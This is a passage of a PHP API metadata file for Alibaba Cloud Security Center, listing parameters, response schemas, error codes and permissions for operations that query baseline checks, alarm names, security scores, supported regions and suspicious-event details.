\\"Name\\": \\"TestStrategy\\",\\n \\"Id\\": 123,\\n \\"CycleStartTime\\": 0,\\n \\"RiskTypeWhiteListQueryResultList\\": [\\n {\\n \\"TypeName\\": \\"hc_exploit\\",\\n \\"Alias\\": \\"Unauthorized Access\\",\\n \\"On\\": false,\\n \\"SubTypes\\": [\\n {\\n \\"TypeName\\": \\"hc_exploit_redis\\",\\n \\"Alias\\": \\"Redis unauthorized access high exploit vulnerability risk\\",\\n \\"On\\": false,\\n \\"CheckDetails\\": [\\n {\\n \\"CheckId\\": 206,\\n \\"CheckItem\\": \\"Ensure password expiration period is set.\\",\\n \\"CheckDesc\\": \\"Set password expiration time, force regular modification of password, reduce password leakage and guess risk.Use non-password login (e.g. key pair) please ignore this item.\\",\\n \\"Rules\\": [\\n {\\n \\"Optional\\": 1,\\n \\"RuleDesc\\": \\"Please customize the password expiration time detection standard as\\",\\n \\"DefaultValue\\": 2,\\n \\"RuleId\\": \\"login_unlock_deny_pam_faillock.must.cus\\",\\n \\"ParamList\\": [\\n {\\n \\"ParamDefaultValue\\": \\"7\\",\\n \\"Value\\": \\"7\\",\\n \\"ParamName\\": \\"range_val\\",\\n \\"MaxValue\\": 999,\\n \\"ParamType\\": 1,\\n \\"ParamDesc\\": \\"The setting value is 0 means no definition, 1 means success, 2 means failure, 3 means success and failure\\",\\n \\"MinValue\\": 1,\\n \\"EnumValue\\": \\"0,1,2,3\\"\\n }\\n ]\\n }\\n ]\\n }\\n ],\\n \\"SupportedOs\\": \\"windows\\"\\n }\\n ]\\n }\\n ],\\n \\"StartTime\\": \\"02:00:00\\",\\n \\"EndTime\\": \\"03:00:00\\",\\n \\"CustomType\\": \\"common\\",\\n \\"TargetType\\": \\"groupId\\",\\n \\"RiskSubTypeName\\": \\"hc_nginx_linux,tomcat7,hc_mysql_ali,hc_docker\\"\\n }\\n}","type":"json"}]', ], 'DescribeStrategyExecDetail' => [ 'summary' => 'Queries the results of the last baseline check by using a specified baseline check policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92206', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check policy.'."\n" ."\n" .'> You can call the [DescribeStrategy](~~DescribeStrategy~~) operation to query the IDs of baseline check policies.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '8437592', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 10. If you leave this parameter empty, 10 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'InProcessCount' => ['description' => 'The number of tasks that are **running **based on the baseline check policy.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'EndTime' => ['description' => 'The time when the baseline check ends.', 'type' => 'string', 'example' => '2021-12-05 00:12:46', 'title' => ''], 'StartTime' => ['description' => 'The time when the baseline check starts.', 'type' => 'string', 'example' => '2021-12-05 00:12:16', 'title' => ''], 'Percent' => ['description' => 'The execution progress of the baseline check policy.', 'type' => 'string', 'example' => '100%', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '01611D72-1E33-53F5-A9A5-C81B5561970F', 'title' => ''], 'FailCount' => ['description' => 'The number of check items that failed to pass the baseline check. This type of check item is considered risk items.', 'type' => 'integer', 'format' => 'int32', 'example' => '94', 'title' => ''], 'Source' => ['description' => 'The type of the baseline check. Valid values:'."\n" ."\n" .'* **Schedule**: automatic check that periodically runs'."\n" .'* **Manual**: intermediate check that is manually performed', 'type' => 'string', 'example' => 'Manual', 'title' => ''], 'SuccessCount' => ['description' => 'The number of check items that **passed** the baseline check.', 'type' => 'integer', 'format' => 'int32', 'example' => '81', 'title' => ''], 'FailedEcsList' => [ 'description' => 'The servers on which risk items were detected.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The server on which risk items were detected.'."\n", 'type' => 'object', 'properties' => [ 'IP' => ['description' => 'The IP address of the server on which the baseline check was performed.', 'type' => 'string', 'example' => '115.28.XX.XX', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address.', 'type' => 'string', 'example' => '115.28.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address.', 'type' => 'string', 'example' => '172.31.XX.XX', 'title' => ''], 'Reason' => ['description' => 'The failure cause for the check item.', 'type' => 'string', 'example' => 'Detect timeout', 'title' => ''], 'InstanceName' => ['description' => 'The name of the instance.', 'type' => 'string', 'example' => 'worker-k8s-for-cs-cf5741fb95c3a45d0864f0e4544dc****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"InProcessCount\\": 0,\\n \\"EndTime\\": \\"2021-12-05 00:12:46\\",\\n \\"StartTime\\": \\"2021-12-05 00:12:16\\",\\n \\"Percent\\": \\"100%\\",\\n \\"RequestId\\": \\"01611D72-1E33-53F5-A9A5-C81B5561970F\\",\\n \\"FailCount\\": 94,\\n \\"Source\\": \\"Manual\\",\\n \\"SuccessCount\\": 81,\\n \\"FailedEcsList\\": [\\n {\\n \\"IP\\": \\"115.28.XX.XX\\",\\n \\"InternetIp\\": \\"115.28.XX.XX\\",\\n \\"IntranetIp\\": \\"172.31.XX.XX\\",\\n \\"Reason\\": \\"Detect timeout\\",\\n \\"InstanceName\\": \\"worker-k8s-for-cs-cf5741fb95c3a45d0864f0e4544dc****\\"\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n 0\\n 2021-12-05 00:12:46\\n 2021-12-05 00:12:16\\n 100%\\n 01611D72-1E33-53F5-A9A5-C81B5561970F\\n 94\\n Manual\\n 81\\n \\n 115.28.XX.XX\\n 115.28.XX.XX\\n 172.31.XX.XX\\n Detect timeout\\n worker-k8s-for-cs-cf5741fb95c3a45d0864f0e4544dc****\\n \\n","errorExample":""}]', 'title' => 'DescribeStrategyExecDetail', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeStrategyExecDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeStrategyExecDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeStrategyTarget' => [ 'summary' => 'Queries the information about the assets to which a baseline check policy is applied.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92208', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.2.X.X', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the policy. Set the value to hc_strategy, which indicates baseline check policies.'."\n", 'type' => 'string', 'required' => true, 'example' => 'hc_strategy', 'title' => ''], ], [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check policy.'."\n", 'type' => 'string', 'required' => true, 'example' => '{"strategyId":8167126}', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '001BAB34-D70A-54B0-B1D7-91B76DCDD8E8', 'title' => ''], 'StrategyTargets' => [ 'description' => 'The information about the assets to which the baseline check policy is applied.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'BindUuidCount' => ['description' => 'The number of the assets that belong to the asset group.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '85', 'title' => ''], 'Flag' => ['description' => 'Indicates whether the baseline check policy is applied to the asset group. Valid values:'."\n" ."\n" .'* **add**: The baseline check policy is applied to the asset group.'."\n" .'* **del**: the baseline check policy is not applied to the asset group.'."\n", 'type' => 'string', 'example' => 'add', 'title' => ''], 'Target' => ['description' => 'The ID of the asset group to which the assets belong or the UUID of the asset.'."\n", 'type' => 'string', 'example' => '9165712', 'title' => ''], 'TargetType' => ['description' => 'The method that is used to add the assets to the baseline check policy. Valid values:'."\n" ."\n" .'* **groupId**: the ID of the asset group'."\n" .'* **uuid**: the UUID of the asset'."\n", 'type' => 'string', 'example' => 'groupId', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"001BAB34-D70A-54B0-B1D7-91B76DCDD8E8\\",\\n \\"StrategyTargets\\": [\\n {\\n \\"BindUuidCount\\": 85,\\n \\"Flag\\": \\"add\\",\\n \\"Target\\": \\"9165712\\",\\n \\"TargetType\\": \\"groupId\\"\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n 001BAB34-D70A-54B0-B1D7-91B76DCDD8E8\\n \\n 85\\n add\\n 9165712\\n groupId\\n \\n","errorExample":""}]', 'title' => 'DescribeStrategyTarget', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeStrategyTarget'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeStrategyTarget', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeStrictEventName' => [ 'summary' => 'Strict mode supports alarm queries', 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '215996', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'Sets the language type for requests and received messages, default is **zh**. Values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English'."\n" ."\n\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Returned message structure.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of this call request, a unique identifier generated by Alibaba Cloud for this request, which can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53C0D****'], 'Data' => [ 'description' => 'Returned data.', 'type' => 'array', 'items' => [ 'description' => 'Details corresponding to each strict mode alarm.', 'type' => 'object', 'properties' => [ 'EventType' => ['description' => 'Alarm type.', 'type' => 'string', 'example' => 'Suspicious Process', 'title' => ''], 'EventName' => ['description' => 'Alarm name.', 'type' => 'string', 'example' => 'System log abnormal deletion', 'title' => ''], 'ShowEventName' => ['description' => 'Displayed alarm name.', 'type' => 'string', 'example' => 'Suspicious Process', 'title' => ''], 'ShowEventType' => ['description' => 'Displayed alarm type.', 'type' => 'string', 'example' => 'System log abnormal deletion', 'title' => ''], 'SwitchConfig' => ['description' => 'Indicates whether the user has enabled the strict mode for this alarm type.'."\n" .'- true: Enabled'."\n" .'- false: Not enabled', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53C0D****\\",\\n \\"Data\\": [\\n {\\n \\"EventType\\": \\"Suspicious Process\\",\\n \\"EventName\\": \\"System log abnormal deletion\\",\\n \\"ShowEventName\\": \\"Suspicious Process\\",\\n \\"ShowEventType\\": \\"System log abnormal deletion\\",\\n \\"SwitchConfig\\": true\\n }\\n ]\\n}","type":"json"}]', 'title' => 'Query Alarm Names in Strict Mode', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeStrictEventName'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:DescribeStrictEventName', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeSummaryInfo' => [ 'summary' => 'Queries the security information about your assets. The information includes the security score and the numbers of protected and unprotected assets.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'D40198E1-6EA8-482E-B3C7-D9573D75C0CA', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request is successful. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'AegisClientOfflineCount' => ['description' => 'The number of unprotected assets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'AegisClientOnlineCount' => ['description' => 'The number of protected assets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '127', 'title' => ''], 'SecurityScore' => ['description' => 'The security score of the assets. Valid values:'."\n" ."\n" .'* 95 to 100: The assets are secure.'."\n" .'* 85 to 94: The assets are exposed to a few security risks. We recommend that you reinforce your security system in a timely manner.'."\n" .'* 70 to 84: The assets are exposed to multiple security risks. We recommend that you reinforce your security system in a timely manner.'."\n" .'* 69 or lower: The current security system is unable to protect the assets against intrusions. We recommend that you reinforce your security system at the earliest opportunity.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '44', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeSummaryInfo', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSummaryInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSummaryInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"D40198E1-6EA8-482E-B3C7-D9573D75C0CA\\",\\n \\"Success\\": true,\\n \\"AegisClientOfflineCount\\": 12,\\n \\"AegisClientOnlineCount\\": 127,\\n \\"SecurityScore\\": 44\\n}","errorExample":""},{"type":"xml","example":"\\n 114\\n E718E19A-4706-4ED0-9570-906724A89340\\n 73\\n 10\\n true\\n","errorExample":""}]', ], 'DescribeSupervisonInfo' => [ 'summary' => 'Queries the latest system vulnerability discovery time.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92211', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'E10BAF1C-A6C5-51E2-866C-76D5922E****', 'title' => ''], 'LatestScanTime' => ['description' => 'The system vulnerability scanning time. The value is a UNIX timestamp. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1721134553000', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query latest system vulnerability discovery time', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSupervisonInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSupervisonInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"E10BAF1C-A6C5-51E2-866C-76D5922E****\\",\\n \\"LatestScanTime\\": 1721134553000\\n}","type":"json"}]', ], 'DescribeSupportRegion' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '2C0699D3-4107-5A46-A4C4-E129A5967788', 'title' => ''], 'SupportRegion' => [ 'description' => 'The list of supported regions.', 'type' => 'array', 'items' => ['description' => 'The region supported by anti-ransomware. Valid values:'."\n" ."\n" .'- **cn-beijing**: China (Beijing)'."\n" .'- **cn-zhangjiakou**: China (Zhangjiakou)'."\n" .'- **cn-huhehaote**: China (Hohhot)'."\n" .'- **cn-hangzhou**: China (Hangzhou)'."\n" .'- **cn-shanghai**: China (Shanghai)'."\n" .'- **cn-shenzhen**: China (Shenzhen)'."\n" .'- **cn-hongkong**: Hong Kong (China)'."\n" .'- **cn-north-2-gov-1**: China North 2 Alibaba Gov Cloud 1'."\n" .'- **cn-qingdao**: China (Qingdao)'."\n" .'- **cn-shanghai-finance-1**: China East 2 Finance Cloud (Shanghai)'."\n" .'- **cn-chengdu**: China (Chengdu)'."\n" .'- **ap-southeast-2**: Australia (Sydney) (decommissioned)'."\n" .'- **ap-southeast-5**: Indonesia (Jakarta)'."\n" .'- **eu-central-1**: Germany (Frankfurt)'."\n" .'- **us-west-1**: US (Silicon Valley)'."\n" .'- **ap-northeast-1**: Japan (Tokyo)'."\n" .'- **us-east-1**: US (Virginia)'."\n" .'- **me-east-1**: UAE (Dubai)'."\n" .'- **cn-shenzhen-finance-1**: China South 1 Finance Cloud.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query regions supported by anti-ransomware', 'summary' => 'Queries the regions supported by anti-ransomware.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSupportRegion'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeSupportRegion', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"2C0699D3-4107-5A46-A4C4-E129A5967788\\",\\n \\"SupportRegion\\": [\\n \\"cn-hangzhou\\"\\n ]\\n}","type":"json"}]', ], 'DescribeSuspEventDetail' => [ 'summary' => 'Queries the details of an exception. An alert event consists of an alert and exceptions. Each alert event is associated with multiple exceptions.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92213', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '121.33.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'default' => 'zh', 'title' => ''], ], [ 'name' => 'SuspiciousEventId', 'in' => 'query', 'schema' => ['description' => 'The ID of the exception.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '32750999', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The data source of the exception. Set the value to sas.'."\n", 'type' => 'string', 'required' => true, 'example' => 'sas', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to query the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '16670360956*****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'DataSource' => ['description' => 'The data source of the exception.'."\n", 'type' => 'string', 'example' => 'aegis_suspicious_****', 'title' => ''], 'EventName' => ['description' => 'The name of the exception.'."\n", 'type' => 'string', 'example' => 'WEBSHELL', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server on which the exception was detected.'."\n", 'type' => 'string', 'example' => '101.132.XX.XX', 'title' => ''], 'AlarmUniqueInfo' => ['description' => 'The unique ID of the alarm event.'."\n" .'> If querying the anomaly information of a single alarm event, you need to provide the unique ID of the alarm event, which can be obtained by calling the [DescribeSuspEvents](~~DescribeSuspEvents~~) interface.', 'type' => 'string', 'example' => '8df914418f4211fb****', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server on which the exception was detected.'."\n", 'type' => 'string', 'example' => '172.26.XX.XX', 'title' => ''], 'LastTime' => ['description' => 'The time when the exception was last detected.'."\n", 'type' => 'string', 'example' => ' 2018-10-30 11:43:46 ', 'title' => ''], 'OperateMsg' => ['description' => 'The message that indicates the handling result of the exception.'."\n", 'type' => 'string', 'example' => 'success', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server on which the exception was detected.'."\n", 'type' => 'string', 'example' => 'bffb12c3-590a-4db2-b538-****', 'title' => ''], 'CanBeDealOnLine' => ['description' => 'Indicates whether the online processing of exceptions is supported, such as blocking an exception, adding an exception to the whitelist, and ignoring an exception. Valid values:'."\n" ."\n" .'* **true**: The online processing of exceptions is supported.'."\n" .'* **false**: The online processing of exceptions is not supported.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '0B48AB3C-84FC-424D-A01D-B9270EF46038', 'title' => ''], 'EventTypeDesc' => ['description' => 'The type of the exception.'."\n", 'type' => 'string', 'example' => 'Malicious Software-Variable Trojan', 'title' => ''], 'EventDesc' => ['description' => 'The description of the exception.'."\n", 'type' => 'string', 'example' => 'The detection model found a suspicious Webshell file on your server, which may be a backdoor file implanted to maintain permissions after the attacker successfully invaded the website.', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server on which the exception was detected.'."\n", 'type' => 'string', 'example' => 'ca_cpm_****', 'title' => ''], 'EventStatus' => ['description' => 'The status of the exception. Valid values:'."\n" ."\n" .'* **1**: pending handling'."\n" .'* **2**: ignored'."\n" .'* **4**: confirmed'."\n" .'* **8**: marked as a false positive'."\n" .'* **16**: handling'."\n" .'* **32**: handled'."\n" .'* **64**: expired'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'SaleVersion' => ['description' => 'The edition of Security Center in which the exception can be detected. Valid values:'."\n" ."\n" .'* **0**: Basic edition'."\n" .'* **1**: Advanced edition'."\n" .'* **2**: Enterprise edition'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'OperateErrorCode' => ['description' => 'The code that indicates the handling result of the exception.'."\n", 'type' => 'string', 'example' => 'quara.Succes', 'title' => ''], 'Level' => ['description' => 'The risk level of the exception. Valid values:'."\n" ."\n" .'* **serious**'."\n" .'* **suspicious**'."\n" .'* **remind**'."\n", 'type' => 'string', 'example' => 'serious', 'title' => ''], 'Id' => ['description' => 'The ID of the exception.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '11416624', 'title' => ''], 'Details' => [ 'description' => 'An array that consists of the details of the exception.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the exception.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The format in which the details of the exception are displayed.'."\n" ."\n" .'Valid values:'."\n" ."\n" .'* **text**'."\n" .'* **html**'."\n", 'type' => 'string', 'example' => 'html', 'title' => ''], 'Value' => ['description' => 'The attribute information about the exception. For example, if the exception is associated with an alert that is triggered by an unusual logon, the information can include the time when the logon is initiated and the location from which the logon is initiated. If the exception is associated with an alert that is triggered by a webshell file, the information can include the path of the trojan file and the type of the trojan.'."\n", 'type' => 'string', 'example' => 'getopt', 'title' => ''], 'NameDisplay' => ['description' => 'The display name of the alert event.'."\n", 'type' => 'string', 'example' => 'Trojan Path', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ['errorCode' => 'DataExists', 'errorMessage' => '%s data exist', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 